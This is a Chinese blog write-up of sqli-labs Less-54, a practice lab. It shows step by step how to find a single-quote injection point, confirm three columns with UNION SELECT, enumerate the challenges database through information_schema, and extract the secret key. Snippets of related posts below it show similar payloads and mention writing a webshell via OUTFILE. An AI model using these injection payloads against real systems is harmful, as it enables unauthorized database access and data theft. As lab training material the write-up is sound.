sqli-Challenges Less-54

最新推荐文章于 2024-03-18 09:04:17 发布
最新推荐文章于 2024-03-18 09:04:17 发布
阅读量120 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107714474
版权

文章目录

1. 题目分析

经过不懈的努力,终于来到了最后一部分。首先看第一关:
题目要求是让我们获取到一个密钥,然后提交;但是我们查询的次数不能超过10次,否则就会重置这个密钥。
在这里插入图片描述
而且这个密钥是存在于challenges这个数据库中。

2. 注入过程

因为条件是超过10就会重置密钥,也不是超过10次就封你的IP什么的。对于我们的影响不是特别大。其实可以忽略这个条件。该做的检测做一下,等到确定了详细的信息,以后直接查询即可。

  1. 首先要判断id的类型。
    通过/?id=1%27 and 1=1 --+/?id=1%27 and 1=2 --+判断出来id是被单引号包裹的。

  2. 检测是否可以进行union查询。
    我们可以利用order by来检测查询字段,这里我直接用?id=1%27 union select 1,2,3 --+试一下,结果证明是三个查询字段。
    在这里插入图片描述

  3. 查询challengs数据库下有哪些数据表

    (select group_concat(table_name) from information_schema.tables where table_schema=“challenges”)

    在这里插入图片描述
    可以看到challenges下只有一张数据表。就是sqc20s3td8(这个名字是随机生成的,当你查询的次数超过10次的时候就会变)

  4. 查询sqc20s3td8表下有哪些字段

    (select group_concat(column_name) from information_schema.columns where table_schema=“challenges” and table_name=“sqc20s3td8”)

    在这里插入图片描述
    可以看到有4个字段:id,sessid,secret_SUA6,tryy,其中secret_SUA6是随机生成的,并且会变。也是存储密钥的字段。

  5. 查询密钥并提交

    (select group_concat(secret_SUA6) from challenges.sqc20s3td8)

    在这里插入图片描述
    这个就是我们要提交的密钥。复制下来输入到下放的文本框里提交。
    在这里插入图片描述
    最后显示congrats you nailedd it表示提交成功。

54-57的思路是一样的,只是id的类型稍有区别,需要使用不同的闭合方式。

sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1677
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1895
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
SQLI-LABS Page-4
Web学习之路
04-12 118
sqli-labs page-4
sqli-labs闯关笔记(Challenges
末初的CSDN博客
05-13 554
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-54Less-55Less-56Less-57Less-58Less-59Less-60Less-61Less-62Less-63Less-64Less-65 正文 Less-54 注入方法和第一关没啥区别,但是做了一个sql查询次数,在表中tryy每查询一次会+1,达到10次重置表名和字段名 但是10次好像没啥影响吧,把过程写一下: http://127.0.0.1/sqli.
MCIR SQLol Challenges SQL注入
312小公举的专栏
05-17 3336
Challenge 0 Your objective is to get the query to return all usernames instead of just one. PARAMETERS: Query Type - SELECT query Injection Type - String value in WHERE clause Method - GET Sanitizat
Sqli-labs less-01
weixin_47075747的博客
12-12 597
Sqli-labs less-01 mysql 基本用法 查库:select schema_name from information_schema.schemata; 查表:select table_name from information_schema.tables where table_schema='security';
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 1202
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs less 54-55
qq_45106794的博客
11-01 237
#sqli-labs less54. 这一关只能进行十次尝试 http://192.168.56.101/sqli-labs-master/Less-54/?id=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=‘challeges’)–+ ...
sqli-labs/Less-54
m0_71299382的博客
11-24 163
sqli-labs第五十四关
[靶场] SQLi-Labs Less62-Less69
3hex的博客
10-28 555
66.Less62 请求方式 注入方式 备注 GET 盲注 130次语句以内完成 http://127.0.0.1:8003/Less-62/?id=1 http://127.0.0.1:8003/Less-62/?id=-1') or 1 --+ http://127.0.0.1:8003/Less-62/?id=-1') or (select 1)<0 --+ 67.Less63 请求方式 注入方式 备注 GET 盲注
sqli-labs Less-11
qq_42630215的博客
03-26 477
Less-11 POST - Error Based - Single quotes - String 0x01.原页面 检查元素可以看到用户名和密码两个参数分别为uname和passwd 输入正确的用户名和密码 有正确的回显 输入错误的用户名和密码 0x02.判断注入类型 uname=1 passwd=1 uname=1" passwd=1 uname=1’ passwd=1 Yo...
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61)
m0_54899775的博客
12-30 1394
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61)
SQL联合注入详解-结合SQLi-lab less1
weixin_45118086的博客
07-09 340
SQL注入详解 首先看一看能不能注入 127.0.0.1/sqli-labs/Less-1/?id=1 order by 3 --+ 发现输入多少都不报错 所以推测应该是字符注入 通过以下两句,判断出字段数为3(order by 4报错) 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ 看一下注入点 127.0.0.1/sqli-labs/Less-1/?id=
Less 18 (请求头注入--user-agent注入)
老司机开代码的博客
08-03 2566
文章目录1. 题目分析2. 构造SQL3. 注入过程4. 使用python进行注入 1. 题目分析 首先我们来分析一下题目: 经过尝试,我们知道,当我们输入正确的用户名和密码的时候,后台会将User Agent返回到屏幕上。 那么根据目前的情况来看,可能存在的注入点有2个: 登录框 user-agent 我们先来看一下源代码: // uagent的接收是未经过严格过滤的 $uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR
Less 5-6(双注入)
老司机开代码的博客
08-03 2038
文章目录1. Less-51.1 问题描述1.2 解法一:双注入破解1.2.1 双注入的过程1.2.2 双注入的原理(floor报错的原因)1. rand()生产随机数的原理2. floor(rand())如何分组1.3 解法二:布尔盲注2. Less-63. 小结 1. Less-5 1.1 问题描述 首先我们看一下题目 意思是考察SQL注入的双注入。 这里涉及到了一个关键的知识点,利用cou...
Less19 (referer注入)
老司机开代码的博客
08-03 1845
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
Less-8(盲注--布尔盲注)
老司机开代码的博客
08-03 1286
文章目录布尔盲注1. 关卡分析2. 盲注思路3. 编写工具进行通关 布尔盲注 在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。 1. 关卡分析 本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返...
Less-7(文件读写操作)
老司机开代码的博客
08-03 1176
文章目录OUTFILE注入实战1. 关卡分析2. 过关斩将2.1 `secure_file_priv`2.2 注入过程 OUTFILE注入 在前面的学习中,我们知道了sql注入中的盲注和双注入是个什么鬼。今天,我门又解锁了一个新的姿势----outfile。 那么outfile是干什么的呢? 简单讲就是将一句话木马通过outfile传入网站目录,然后连上去;然后你就能为所欲为了(理想情况下)。 实...
Less 24(二次注入)
老司机开代码的博客
08-04 1018
文章目录前言1. 二次注入的原理1.1 个人理解1.2 Example2. 题目分析2.1 主页2.2 注册页面2.3 登录成功界面(修改密码)3. 注入过程首先看一下数据库中原本的用户信息: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200711191827350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubm
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值